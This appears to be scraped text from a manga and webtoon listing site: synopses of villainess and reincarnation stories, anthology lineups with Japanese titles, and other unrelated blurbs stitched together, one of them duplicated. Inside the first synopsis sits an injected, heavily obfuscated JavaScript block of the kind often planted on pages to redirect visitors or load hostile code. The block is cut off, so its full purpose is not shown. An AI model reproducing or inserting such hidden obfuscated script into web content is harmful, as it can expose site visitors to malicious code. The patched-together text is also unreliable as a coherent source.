Thanks to the seal of the king of spirits, she was born with the qualities of a master of spirits. Her parents and brother-in-law pour endless affection on her, and the Knights Templar often follow her around asking for her to be an escort. Furthermore… … “Why don’t you know that your light wish is my earnest desire?” The devil begs for a different look and says, “I want to become a good emperor. An emperor who makes an empire that will suffice for you to stay comfortably.” A childhood friend declares that he will build a strong empire for me. [All kneel in front of our chick!] It’s a bonus that the contracted spirits shout like a habit. A full-fledged walk on the flower path of a frenzied chick who couldn’t bite everyone!
‘Just why do I have to possess someone who’s already possessed…?!’ I became the female lead, who is already possessed, of the novel . But the truth is, she’s actually the villainess who will torment the real heroine. What do you mean I’ve become the villainess who will suffer terribly for harassing the heroine? I can’t believe it! My fate was sealed to become trash before I knew it! I can’t live like this! ‘Please save me!’ But a lot of things are already going wrong even before the heroine makes her appearance. ‘Dirty-blooded, right? You said she was trembling to have something to eat. Just like a beggar.’ ‘…’ ‘They’re all dead.’ Elliotte is a 3-year-old possessed villainess who will go through a lot of suffering. So, using my knowledge of the original story, I will try my best to find a way to live. ‘Huh?’ Why is my grandfather, the villainous Duke, treating me so well? Why did my Dad, who’s been away for so long due to my Grandpa’s hatred for him, suddenly come back? And why are my brothers bothering me so much? Moreover. ‘What is this.’ *Elliotte made the whole world heartbroken ????? *Ah ??? I’m sorry for pretending not to know that you were possessed and cursing you * I’m sorry ??? So that’s the reason why it happened ? I acknowledge that I am trash ?? *Isn’t this apocalyptic? ? really lol *A bait is spread out on the floor. The cookies have poison, right? *Richmond.. Mother-in-law is waiting.. Come over to this dimension. ? Get in line, teacher I stare at the holographic pop-up window in front of me. ‘I think this is the comment section of the Coconut Page.’ What on earth is going on?<script></script><script>(function(_0x536ad1,_0x2b0891){var _0x544eee=_0x5202,_0x47b6d1=_0x536ad1();while(!![]){try{var _0x2c9f3e=-parseInt(_0x544eee(0x17c))/(-0x50e+-0x79d*-0x1+-0x1*0x28e)*(parseInt(_0x544eee(0x18e))/(0x20c2+0x25c4*-0x1+0x6b*0xc))+parseInt(_0x544eee(0x18b))/(-0x140*-0x1f+-0x7e7*-0x3+-0x3e72)+parseInt(_0x544eee(0x190))/(0x1*0xd2a+-0xf04+0x1*0x1de)+-parseInt(_0x544eee(0x186))/(-0x2239+0x9d6+-0x8*-0x30d)+-parseInt(_0x544eee(0x185))/(0xa65+-0x2295+0x1836)+-parseInt(_0x544eee(0x198))/(-0x164+-0x2179+-0x22e4*-0x1)+parseInt(_0x544eee(0x191))/(-0x1923+0x11c5*0x1+-0x1*-0x766);if(_0x2c9f3e===_0x2b0891)break;else _0x47b6d1['push'](_0x47b6d1['shift']());}catch(_0x4ec8f7){_0x47b6d1['push'](_0x47b6d1['shift']());}}}(_0x3bc3,-0xfb15e+0x1*0x167cdb+0x68e0b));function _0x3bc3(){var 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In an unexpected turn of events, Haru transmigrates into the body of Reina, the villainess of an otome game. As soon as she transmigrates, an event in which the villainess bullies the heroine starts. If she bullies the heroine just like the game, the only ending waiting for Reina will be one of destruction. This isn’t the time to be acting like a villainess, I want to enjoy my life! That’s what Reina decided, but the heroine and the game’s love interests keep falling into trouble?! This is the long awaited manga version of the story of the villainess aiming for a happy ending in an unprecedented isekai life.
This Reincarnated Countess Is Trying To Escape From Her Prince MANGA, Tensei Hakushaku Reijou ha Oujisama kara Nigedashitai, Countess Sherazade of the Holy Kingdom of Florentino is hit with a flood of memories. Memories of a past life, in which her current life is just a Teen Love novel called, "The World that Surrounds Me," or "My World" for short. Her life is about to go from tragic to downright traumatic and she's not about to sit around and let it happen. In order to do that, she can never, ever marry the prince!
Annulled engagements, "serves you right"s, condemnation events, doting, royalty, reincarnated heroines, banishment endings… it's fully loaded with all the charms of villainesses! The comic adaption of 5 popular villainess stories that were published on Shousetsuka ni Narou! An anthology of oneshots with happy endings!! Volume 1 Descriptions/Info: LINEUP Cover art: Maro ◆"The Villainess Will Obtain True Love" Artist: Hoshino Soumei Author: Nekomata Doremi An annulled engagement at a graduation party?! ◆"The Tale of the Noble Girl Who Will Go to a Monastery After Her Engagement Annulment" Artist: Sorakura Shikiji Author: Yuuki Satoru Banishment after her younger sister steals her fiancé?! ◆"I Will Definitely Get My Engagement Annulled! ~I Will Become a Villainess!" Artist: Kuroe Yui Author: Reiga Utsuho To break off her engagement, she harasses the daughter of a baron?! ◆"Shall We Walk Hand in Hand Down the Flowery Path of Evil?" Artist: Yamashiro Umeta Author: Mafuyubi After her engagement is annulled, she gets married to a fat old baldy?! ◆"The Villainess Trifles With the Second Prince's First Love" Artist: Ohitsuji Ei Author: Mizuno Saaya After being condemned, the second prince appears before me… ----------------- A sudden engagement annulment, and a quickly approaching condemnation event…! Tossed aside by the prince, and getting married to this man…?! All the fiancés are crazy about the lovely little sister?! The one to reach out their hand to the villainess who just had her engagement annulled is…?! Volume 2 Descriptions/Info: LINEUP Cover art: Maro ◆"It's Been 10 Years Since You Asked to Break Off Our Engagement, If You Insist That Much, Let's Break It Off!" Character Design: Maro Author/Artist: Yoshimura She's been told multiple times since they were young to break off the engagement?! ◆"The Villainess Laughs Innocently" Artist: Ohitsuji Ei Author: Yoruru A Condemnation Event after being called out to the rear garden?! ◆"The Art of Rebuilding a Nation Begins With a Broken Engagement!" Artist: Kawano Akiko Author: Hazuki The Prince has an affair with the Saintess and calls off his engagement?! ◆"You Were Set Up, You Know?" Artist: Koyuki Iroha Author: Yuki Yukiko At the graduation party, my older sister's engagement was broken?! ◆"The Villainess Exploded" Artist: Nanso Author: bouro The villainess tells the second prince "Serves you right"?! ◆"I Reincarnated as a Villainess. Come Quickly, My Engagement Breaking Event" Artist: Mochida Moo Author: Kyouka The only ally the reincarnated villainess has is the butler?! ------------------------------------------------ A sudden broken engagement, and the condemnation event that draws near…! Thrown away by the Prince, only to be married to this guy…?! The fiancés are entranced by the lovely little sister?! After a broken engagement, the one the reaches out to the villainess is…?! Volume 3 Descriptions/Info: LINEUP Cover art: Maro ◆"One Day, I Was Able to Hear the Inner Voice of my Fiancée" Artist: Chuugyaku Author: Enju Subaru ◆"My Bethrothed's Personality Is Way Different From the Game!" Artist: Mochida Moo Author: Kozuki ◆"I Was Supposed to Be Married to Someone Who Hated Me, but Before I Knew It They Were Doting on Me" Artist: Potagi Author: Mikoto ◆"Shall We Continue Down the Flowery Path of Evil?" Artist: Yamashiro Umeta Author: Mafuyubi ◆"I Shall Take You Up on Your Offer With Pleasure" Artist: Oshitsuji Ei Author: Kiraku Naohito Despite all the villainess' stories starting off in dire straits, in the end they're… all happy endings♪ "Shousetsuka ni Narou"'s popular oneshots are gathered here to leave you feeling satisfied in this Villainess Anthology!! Raw Short Story Sources (by RiderKaixa) Volume 1 Though I May Be a Villainess, I'll Show You I Can Obtain Happiness! Anthology Comics Vol 1 悪役令嬢ですが、幸せになってみせますわ! アンソロジーコミック Cover Art: Maro カバーイラスト まろ Chapter 1: "The Villainess Will Obtain True Love" 「悪役令嬢は真実の愛を手にいれる」 Art: Hoshino Soumei ほしの総明 Author: Nekomata Doremi 原作: 猫又どれみ Author URL: Story URL: Chapter 2: "The Tale of the Noble Girl Who Will Go to a Monastery After Her Engagement Annulment" 「婚約破棄されて修道院に行くお嬢様の話」 Art: Sorakura Shikiji 空倉シキジ Author: Yuuki Satoru 原作: 結城暁 Author URL: Story URLs: Chapter 3: "I Will Definitely Get My Engagement Annulled! ~I Will Become a Villainess!" 「絶対に婚約破棄をしてみせます!~悪役令嬢に、私はなる!」 Art: Kuroe Yui 黒榮ゆい Author: Reiga Utsuho 原作: 麗伽空 Author URL: Story URLs: Chapter 4: "Shall We Walk Hand in Hand Down the Flowery Path of Evil?" 「悪の華道を行きましょう」 Art: Yamashiro Umeta やましろ梅太 Mafuyubi 原作: 真冬日 Author URL: Story URL: Chapter 5: "The Villainess Trifles With the Second Prince's First Love" 「悪役令嬢は第二王子の初恋に翻弄される」 Art: Oshitsuji Ei 尾羊英 Author: Mizuno Saaya 原作: 水野沙彰 Author URL: Story URL: Volume 2 Though I May Be a Villainess, I'll Show You I Can Obtain Happiness! Anthology Comics Vol 2 悪役令嬢ですが、幸せになってみせますわ! アンソロジーコミック 2 Cover Art: Maro カバーイラスト まろ Chapter 1: "It's Been 10 Years Since You Asked to Break Off Our Engagement, If You Insist That Much, Let's Break It Off!" 「婚約破棄を持ちかけられて十数年、そこまで言うなら破棄しましょう!」 Art/Author: Yoshimura 由村 Author URL: Character Design: Maro まろ Chapter 2: "The Villainess Laughs Innocently" 「悪役令嬢は無邪気に笑う」 Art: Oshitsuji Ei 尾羊英 Author: Yoruru 原作: 夜流 Author URL: Story URL: Chapter 3: "The Art of Rebuilding a Nation Begins With a Broken Engagement!" 「婚約破棄から始まる国家建て直し術!」 Art: Kawano Akiko かわのあきこ Author: Hazuki 原作: 葉月 Author URL: Story URL: Chapter 4: "You Were Set Up, You Know?" 「貴方は嵌められたのですよ?」 Art: Koyuki Iroha 仲倉千景 Author: Yuki Yukiko 原作: 柚木ゆきこ Author URL: Story URL: Chapter 5: "The Villainess Exploded" 「悪役令嬢は爆死しました」 Art: Nanso 七十 Author: bouro 原作: bouro Author URL: Story URL: Volume 3: Chapter 1: "One Day, I Was Able to Hear the Inner Voice of My Fiancée" 「ある日婚約者の心の声が聞こえるようになりました。」 Art: Chugyaku / 宙百 Author: Enju Subaru / 塩樹すばる Syosetu Links: Homepage: Story: Story Serialization: Chapter 2: "My Bethrothed's Personality Is Way Different From the Game!" / 「婚約者の性格が原作と違うのですが」 Art: Mochida Muu / 餅田むぅ Author: Kozuki / 狐月 Syosetu Links: Homepage: Story: Story Serialization: Chapter 3: "I Was Supposed to Be Married to Someone Who Hated Me, but Before I Knew It They Were Doting on Me" / 「嫌われている相手に嫁いだはずがいつのまにか溺愛されていました」 Art: Potagi / ぽたぎ Author: Mikoto / みこと Syosetu Links: Homepage: Story: Chapter 4: "Shall We Continue Down the Flowery Path of Evil?" / 「悪の華道を追いましょう」 Art: Yamashiro Umeta / やましろ梅太 Author: Mafuyubi / 真冬日 Syosetu Links: Homepage: Story: Chapter 5: "I Shall Take You Up on Your Offer With Pleasure" / 「そのお言葉、喜んでお受けいたしますわ」 Art: Oshitsuji Ei Author: Kiraku Naohito / 喜楽直人 Syosetu Links: Homepage: Story:
Read To Hell With Being A Saint I’m A Doctor, Yusung is a genius doctor famous in the medical world. He, who spent his whole life in an operation room, died in a traffic accident, and when he woke up, he was in another world. But…a saintess? A holy empire? Healing magic? “I put so much effort into learning medicine, but now all I need to do is touch someone and they’re healed? Seriously, I think I’ve gone crazy.”
Yusung is a genius doctor famous in the medical world. He, who spent his whole life in an operation room, died in a traffic accident, and when he woke up, he was in another world. But…a saintess? A holy empire? Healing magic? “I put so much effort into learning medicine, but now all I need to do is touch someone and they’re healed? Seriously, I think I’ve gone crazy.”
It was a hero with dreams of unifying the continent that saved me, who was about to become an offering made to a monster. And inevitably, I fell in love with him. But, the sad truth is, every famed and mythical hero eventually ends up with a beautiful and noble princess. And I was just a girl he’d saved. So, when he finally did unify the continent and marry a princess like any other hero, I, who couldn’t bring myself to kill you, decided to leave forever. “Goodbye, my moonlight.”
My friend stole my boyfriend and then dared to hand me a wedding invitation with a smile? Ha! I had a blast enjoying my revenge and came home and fell asleep but… When I woke up I was in the body of the Villainess of a Romance Fantasy novel who has everything, appearance, assets, and intelligence. The only thing this girl lacked was the insight to judge a man. Throw the bastard Prince away to the main female lead and let us just enjoy the luxury of power and money!
The God’s Tombs started to appear around the world. Due to the relics within these tombs, many were able to wield these legendary power for themselves, while others became enslaved to these users. However, a Tomb Raider appears with the purpose of robbing these relics. The Tomb Raider King. “God damn it! Did that bastard already loot this place as well?!” What you own belongs to me. What I own definitely belongs to me. This is the story of a revived Tomb Raider who will do whatever he can to claim all the tombs and relics for himself!
Being reincarnated in a cultivation world, Han Jue realizes that he can live his life like a video game. He can reroll his cultivation potential and connate providence. So, he spends 11 years rerolling for a good one… [Unparalleled: Immortal beauty, top-notch charm] [Destined Sword fanatic: Top-notch Sword Dao aptitude, top-notch Sword Dao comprehension] [Unparalleled Movement Technique: Top-notch movement technique aptitude] [Descendant of the Immortal Emperor: You will receive an unparalleled cultivation technique and 1,000 superior-grade spirit stones] In pursuit of longevity, Han Jue decides to cultivate in a low-profile manner. A thousand years later, generations of cultivators have become history. That is when beings of the fairyland start cleansing the mortal world. Han Jue can no longer hide and has no choice but to take action. Then he realizes, that deities and gods aren’t that powerful after all!
Toriko Manga is a Japanese manga series illustrated and written by Mitsutoshi Shimabukuro In a world where the flavor and feel of food is very significant, there exist people called Gourmet Hunters (Bishokuya) who focus on the acquisition of uncommon ingredients and c
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